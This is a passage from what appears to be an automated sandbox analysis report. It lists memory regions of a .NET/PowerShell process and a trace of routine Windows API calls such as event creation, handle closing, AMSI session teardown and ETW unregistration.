0x7ffb0ad41fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\system.servicemodel.internals.ni.dll") Region: id = 9784 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9785 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9786 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9791 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9792 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9793 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9798 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9799 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9800 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9801 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9802 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9803 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9804 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9805 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9807 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9808 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9812 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9813 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9814 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9815 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9816 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9817 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9818 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9819 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9824 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9825 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9826 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9827 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9828 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9829 start_va = 0x1bb70000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 9832 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9833 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9834 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9835 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9838 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9839 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9840 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9841 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9842 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9847 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9848 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9849 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9850 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9851 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9852 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9853 start_va = 0x1bb70000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 9854 start_va = 0x1bb80000 end_va = 0x1bb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb80000" filename = "" Region: id = 9855 start_va = 0x1bb90000 end_va = 0x1bb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb90000" filename = "" Region: id = 9868 start_va = 0x7ffb03480000 end_va = 0x7ffb03d89fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\9be0116d0c465b75b11a42413573047c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\9be0116d0c465b75b11a42413573047c\\system.data.ni.dll") Region: id = 9870 start_va = 0x7ffb03130000 end_va = 0x7ffb0347cfff monitored = 1 entry_point = 0x7ffb0327158e region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 9871 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9872 start_va = 0x1bb40000 end_va = 0x1be83fff monitored = 1 entry_point = 0x1bc8158e region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 9873 start_va = 0x7ffaa9f60000 end_va = 0x7ffaa9f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f60000" filename = "" Region: id = 9877 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9882 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9883 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9884 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9885 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9886 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9891 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9892 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9893 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9894 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9895 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9896 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9901 start_va = 0x1a540000 end_va = 0x1a540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 9902 start_va = 0x1bb80000 end_va = 0x1bbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb80000" filename = "" Region: id = 9903 start_va = 0x1bbc0000 end_va = 0x1bc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bbc0000" filename = "" Region: id = 9904 start_va = 0x1bb40000 end_va = 0x1bb67fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9905 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9910 start_va = 0x7ffb02440000 end_va = 0x7ffb03125fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\microsoft.powershell.commands.utility.ni.dll") Region: id = 9919 start_va = 0x1a540000 end_va = 0x1a545fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 9920 start_va = 0x1bb40000 end_va = 0x1bb67fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9924 start_va = 0x7ffaa9f70000 end_va = 0x7ffaa9f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f70000" filename = "" Region: id = 9926 start_va = 0x7ffaa9f80000 end_va = 0x7ffaa9f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f80000" filename = "" Region: id = 9927 start_va = 0x7ffaa9f90000 end_va = 0x7ffaa9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f90000" filename = "" Region: id = 9928 start_va = 0x7ffaa9fa0000 end_va = 0x7ffaa9faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fa0000" filename = "" Region: id = 9933 start_va = 0x1a540000 end_va = 0x1a545fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 9940 start_va = 0x1bb40000 end_va = 0x1bb67fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9941 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9946 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9947 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9948 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9949 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9950 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9955 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9956 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9957 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9958 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9959 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9963 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9965 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9966 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9967 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9972 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9973 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9974 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9975 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9976 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9977 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9982 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9983 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9984 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 9985 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 9986 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9987 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9988 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9989 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9991 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9995 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9996 start_va = 0x1a550000 end_va = 0x1a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 9997 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9998 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 10003 start_va = 0x7ffaa9fb0000 end_va = 0x7ffaa9fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fb0000" filename = "" Region: id = 10008 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 10009 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 10202 start_va = 0x1bb40000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 10207 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 10212 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 10213 start_va = 0x1bc40000 end_va = 0x1bd1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 226 os_tid = 0xb60 [0239.893] AmsiCloseSession () returned 0x7ffb1cb78068 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x694 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6a4 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x564 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6dc [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6ec [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6f4 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6e8 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6ac [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6f8 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6e0 [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6fc [0239.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x698 [0239.895] SetEvent (hEvent=0x6dc) returned 1 [0239.895] SetEvent (hEvent=0x694) returned 1 [0239.895] SetEvent (hEvent=0x6a4) returned 1 [0239.895] SetEvent (hEvent=0x564) returned 1 [0239.895] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x700 [0239.896] SetEvent (hEvent=0x574) returned 1 [0240.259] SetEvent (hEvent=0x6ec) returned 1 [0240.259] SetEvent (hEvent=0x6f4) returned 1 [0240.259] SetEvent (hEvent=0x6e8) returned 1 [0240.326] CoCreateGuid (in: pguid=0xccbf8 | out: pguid=0xccbf8*(Data1=0x5993cee9, Data2=0x9b23, Data3=0x4cb4, Data4=([0]=0x9e, [1]=0x3a, [2]=0x1e, [3]=0x40, [4]=0x9b, [5]=0x6f, [6]=0xec, [7]=0xfe))) returned 0x0 [0240.330] ReportEventW (hEventLog=0x1a670008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2801008*="Stopped", lpRawData=0x2800e70) returned 1 [0240.336] AmsiCloseSession () returned 0x7ffb1cb78068 [0240.336] AmsiUninitialize () returned 0x1 [0240.392] SetEvent (hEvent=0x574) returned 1 [0240.617] CloseHandle (hObject=0x574) returned 1 [0240.618] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0240.642] CoGetContextToken (in: pToken=0xcf960 | out: pToken=0xcf960) returned 0x0 [0240.642] CObjectContext::QueryInterface () returned 0x0 [0240.642] CObjectContext::GetCurrentThreadType () returned 0x0 [0240.642] Release () returned 0x0 [0240.643] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0240.643] CObjectContext::QueryInterface () returned 0x0 [0240.643] CObjectContext::GetCurrentThreadType () returned 0x0 [0240.643] Release () returned 0x0 [0240.649] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0240.649] CObjectContext::QueryInterface () returned 0x0 [0240.649] CObjectContext::GetCurrentThreadType () returned 0x0 [0240.649] Release () returned 0x0 [0240.675] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0240.675] CObjectContext::QueryInterface () returned 0x0 [0240.675] CObjectContext::GetCurrentThreadType () returned 0x0 [0240.675] Release () returned 0x0 [0240.708] CoGetContextToken (in: pToken=0xcf480 | out: pToken=0xcf480) returned 0x0 [0240.708] CObjectContext::QueryInterface () returned 0x0 [0240.708] CObjectContext::GetCurrentThreadType () returned 0x0 [0240.708] Release () returned 0x0 [0240.708] CoUninitialize () Thread: id = 232 os_tid = 0x1004 Thread: id = 233 os_tid = 0x1008 Thread: id = 234 os_tid = 0x744 [0226.640] CoGetContextToken (in: pToken=0x1effac0 | out: pToken=0x1effac0) returned 0x0 [0226.640] CoGetContextToken (in: pToken=0x1eff9c0 | out: pToken=0x1eff9c0) returned 0x0 [0226.640] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0226.641] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0226.641] RegCloseKey (hKey=0x564) returned 0x0 [0230.582] CloseHandle (hObject=0x6ac) returned 1 [0230.582] CloseHandle (hObject=0x698) returned 1 [0230.582] CloseHandle (hObject=0x564) returned 1 [0230.582] CloseHandle (hObject=0x694) returned 1 [0230.583] CloseHandle (hObject=0x6a4) returned 1 [0230.583] CloseHandle (hObject=0x67c) returned 1 [0230.583] CloseHandle (hObject=0x690) returned 1 [0230.583] CloseHandle (hObject=0x6b0) returned 1 [0230.583] CloseHandle (hObject=0x68c) returned 1 [0230.583] CloseHandle (hObject=0x6a0) returned 1 [0230.583] CloseHandle (hObject=0x69c) returned 1 [0230.584] CloseHandle (hObject=0x688) returned 1 [0232.133] CertFreeCertificateContext (pCertContext=0x1a9372a0) returned 1 [0232.133] CertFreeCertificateContext (pCertContext=0x1a939720) returned 1 [0234.542] CertFreeCertificateContext (pCertContext=0x1a939720) returned 1 [0234.543] CloseHandle (hObject=0x694) returned 1 [0240.644] EtwEventUnregister () returned 0x0 [0240.644] EtwEventUnregister () returned 0x0 [0240.644] EtwEventUnregister () returned 0x0 [0240.644] EtwEventUnregister () returned 0x0 [0240.644] EtwEventUnregister () returned 0x0 [0240.647] LocalFree (hMem=0x1a9653e0) returned 0x0 [0240.647] LocalFree (hMem=0x1a965600) returned 0x0 [0240.651] EtwEventUnregister () returned 0x0 [0240.654] CloseHandle (hObject=0x2f0) returned 1 [0240.660] EtwEventUnregister () returned 0x0 [0240.665] CloseHandle (hObject=0x578) returned 1 [0240.665] CloseHandle (hObject=0x57c) returned 1 [0240.665] CloseHandle (hObject=0x594) returned 1 [0240.665] CloseHandle (hObject=0x568) returned 1 [0240.666] CloseHandle (hObject=0x570) returned 1 [0240.666] CloseHandle (hObject=0x58c) returned 1 [0240.666] CloseHandle (hObject=0x590) returned 1 [0240.667] CloseHandle (hObject=0x56c) returned 1 [0240.667] CloseHandle (hObject=0x560) returned 1 [0240.667] CloseHandle (hObject=0x55c) returned 1 [0240.668] CloseHandle (hObject=0x37c) returned 1 [0240.668] CloseHandle (hObject=0x6f8) returned 1 [0240.668] CloseHandle (hObject=0x6ac) returned 1 [0240.668] CloseHandle (hObject=0x6e8) returned 1 [0240.669] CloseHandle (hObject=0x6f4) returned 1 [0240.669] CloseHandle (hObject=0x6ec) returned 1 [0240.669] CloseHandle 